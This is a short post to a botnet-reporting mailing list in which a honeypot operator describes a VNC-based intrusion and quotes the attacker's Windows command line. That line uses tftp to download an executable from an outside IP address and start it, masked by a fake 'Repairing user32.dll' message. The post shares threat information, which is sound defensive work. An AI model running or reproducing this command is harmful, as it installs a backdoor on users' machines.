To report a botnet PRIVATELY please email: [EMAIL PROTECTED] ---------- Saw this come across my honeypot today.
Attacked using VNC. Does a Start-> Run then: %comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 64.79.213.12 GET ymlhpi.exe & start ymlhpi& Symantec recognizes it as: Backdoor.Trojan (really descriptive, eh), however, this is the first time I've seen this particular type of traffic bot. Best Regards; Ian -- Ian Wilson [EMAIL PROTECTED] http://ianwilson.org || http://www.ians-blog.com Proceed at your own risk. Do not spray directly into eyes. Not for Internal use. Use as directed. _______________________________________________ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
